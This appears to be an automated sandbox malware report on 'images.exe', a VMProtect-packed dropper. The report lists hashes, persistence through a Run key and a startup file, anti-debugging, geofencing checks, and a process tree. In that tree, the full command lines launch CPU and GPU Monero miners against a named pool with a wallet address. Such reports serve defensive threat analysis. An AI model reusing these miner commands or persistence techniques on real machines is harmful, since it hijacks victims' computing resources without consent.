Analysis

  • max time kernel: 150s
  • max time network: 151s
  • platform: windows10-2004_x64
  • resource: win10v2004-20241007-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 20-11-2024 10:14

General

  • Target: images.exe
  • Size: 4.5MB
  • MD5: 32f21ab8cf9b96e8ba86395a0edc2e4f
  • SHA1: 2a5b3c07e32b3b2b0c1ef33a10685027703440ec
  • SHA256: 20389c7d417ec512e18bb246a693ce37e041390b6cf1cdd5dca0728b709f910d
  • SHA512: d7fc84e52ad671f55f07bd46a06ea3b881606f21c457e21d50bc45e08339926d13890792503d3bca46edc866f7a739cf7b845f0182ed18bcdb70bca1db011f6c
  • SSDEEP: 98304:DMUaI9OMzejqikpYbAI7XLyhq6IvorAJKn6kD801cgl0+BhV1C8q0DBAvD:I8Oxy61y6g38ScglnBh20FMD

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • VMProtect packed file 6 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\images.exe
    "C:\Users\Admin\AppData\Local\Temp\images.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Users\Admin\AppData\Roaming\Images\image.exe
      "C:\Users\Admin\AppData\Roaming\Images\image.exe" SW_HIDE
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1596
      • C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe
        "C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -u 43rZr2dDZTKS1MtfWqYeAwWijfNME2u6Z6Peh3DZmBie9BkZiXtiMvRWxrAucA5PsQBs17MmuzidoFWwofhkWzEBUGkKVBe -p x
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:2360
      • C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe
        "C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -u 43rZr2dDZTKS1MtfWqYeAwWijfNME2u6Z6Peh3DZmBie9BkZiXtiMvRWxrAucA5PsQBs17MmuzidoFWwofhkWzEBUGkKVBe -p x
        3⤵
        • Executes dropped EXE
        PID:752
      • C:\Users\Admin\AppData\Roaming\Images\load.exe
        "C:\Users\Admin\AppData\Roaming\Images\load.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4700

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
    Filesize: 717B
    MD5: 822467b728b7a66b081c91795373789a
    SHA1: d8f2f02e1eef62485a9feffd59ce837511749865
    SHA256: af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
    SHA512: bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7067C2300B3C5B8750D4DEF7C03F30B0
    Filesize: 345B
    MD5: 1a2fcc2b961beda04d8f8d4135759a4c
    SHA1: 25dc5eee0333533aa0476fbe9d35ecc77f48a460
    SHA256: ac6b6025fd3a31beb1cb8f4b9bcad7b941312b12ac8a74aa1219fff35f865171
    SHA512: 426970f0f185ddd71c7767b19a56a46007ee76db9ecb2546f3ff1da46f19828327dc294fb81ba350fcf1df7c64778acbbb521fa9ebf12bd597d74df90bfd4b06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
    Filesize: 192B
    MD5: 9d94685fb9ac6907513f964555554f38
    SHA1: f4421d451539c3558fed835c1595cd1a56e328f7
    SHA256: edb0b7edb817871238bb3865d018991fa316500b689055bc22334bd7444fac2a
    SHA512: f853b7023666306c4c7706bcd61d6e3c1901cc6f1adc364dd33d2bfe038bd67fb39ad849443f7cd38106fdc784f10e8d38dbe6496b98eae9ad58f37c63d43394

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7067C2300B3C5B8750D4DEF7C03F30B0
    Filesize: 544B
    MD5: 1bbb5840bc6e8dda47e2c699291efe00
    SHA1: 550f1dbbf4c72fb318e8fbe54e66aecd36a320a3
    SHA256: 410ddbf998fa66f1de881061bb38224d92e3f175971c05c90448107be68ddf9f
    SHA512: 20883c0cd20b77df0836fffec01d1d255ef1917eaa7ac27fe545c1fcea537af7b152f429952dbd48be24639a819bf2c561ef5e0d24a65225ee64f3ac7d21baa4

  • C:\Users\Admin\AppData\Local\Temp\nsi8D4D.tmp\System.dll
    Filesize: 11KB
    MD5: c17103ae9072a06da581dec998343fc1
    SHA1: b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
    SHA256: dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
    SHA512: d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

  • C:\Users\Admin\AppData\Local\Temp\nsl6F26.tmp\inetc.dll
    Filesize: 21KB
    MD5: d7a3fa6a6c738b4a3c40d5602af20b08
    SHA1: 34fc75d97f640609cb6cadb001da2cb2c0b3538a
    SHA256: 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
    SHA512: 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

  • C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe
    Filesize: 1.5MB
    MD5: eedb9d86ae8abc65fa7ac7c6323d4e8f
    SHA1: ce1fbf382e89146ea5a22ae551b68198c45f40e4
    SHA256: d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
    SHA512: 9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

  • C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe
    Filesize: 1.5MB
    MD5: 35d2c42b6ee0acbce9dfe8cc418fe5d8
    SHA1: 66b965d1ee4013c80f7e0e27725e43f3d316325a
    SHA256: 7a2a860bb344526e8546acd172522b4d276a4647f43dd4720281d40e390b283e
    SHA512: 00d89a686995d7b2415f6de5786a175232606cb962744149129ed329fcbf0d4ee076e9bc1125adcaa58571ade5f22372b0bef2d2af78dd12378654e6e23b5ebf

  • C:\Users\Admin\AppData\Roaming\Images\image.exe
    Filesize: 4.5MB
    MD5: 32f21ab8cf9b96e8ba86395a0edc2e4f
    SHA1: 2a5b3c07e32b3b2b0c1ef33a10685027703440ec
    SHA256: 20389c7d417ec512e18bb246a693ce37e041390b6cf1cdd5dca0728b709f910d
    SHA512: d7fc84e52ad671f55f07bd46a06ea3b881606f21c457e21d50bc45e08339926d13890792503d3bca46edc866f7a739cf7b845f0182ed18bcdb70bca1db011f6c

  • C:\Users\Admin\AppData\Roaming\Images\load.exe
    Filesize: 44KB
    MD5: bc6db57b6f9118ecb27625cb7646688a
    SHA1: 0f864d398c98f3bde6304145b3f65fa65e62d320
    SHA256: 115d327daa7b69fac688a274f18629d3a0dbc92726413af45ab71e51bd03df28
    SHA512: 815d2195c8e8e0e4a9d922f9c6e17259be78ceda370968c2aa1a8fbc82717cdc7d255dbfa9f95e8dab931c18f03d08eef3fb0e3231a8f01cb0bfda64eb53d754

  • C:\Users\Admin\AppData\Roaming\Images\pools.txt
    Filesize: 160B
    MD5: 7dc8fd6041f1fd72d9ca2140d0973e5f
    SHA1: f51572e60f541044672256c1f2aab74736d78c33
    SHA256: b209b7af96ab8da92860bda8856a4b5632e142011489de12cac9487fc22c652d
    SHA512: 9abc1a281287665378544d1766ac86a1cb217ba0daf1ed27e05d58bfd4e048237292e531b13e9c1bf3349dfcd9bada23dadd482a4ae267a58a97809f8c03774a

  • memory/752-70-0x00007FF6C0320000-0x00007FF6C06DC000-memory.dmp
    Filesize: 3.7MB

  • memory/2360-60-0x00007FF647D00000-0x00007FF6480AD000-memory.dmp
    Filesize: 3.7MB

  • memory/2360-74-0x00007FF647D00000-0x00007FF6480AD000-memory.dmp
    Filesize: 3.7MB

  • memory/2360-93-0x00007FF647D00000-0x00007FF6480AD000-memory.dmp
    Filesize: 3.7MB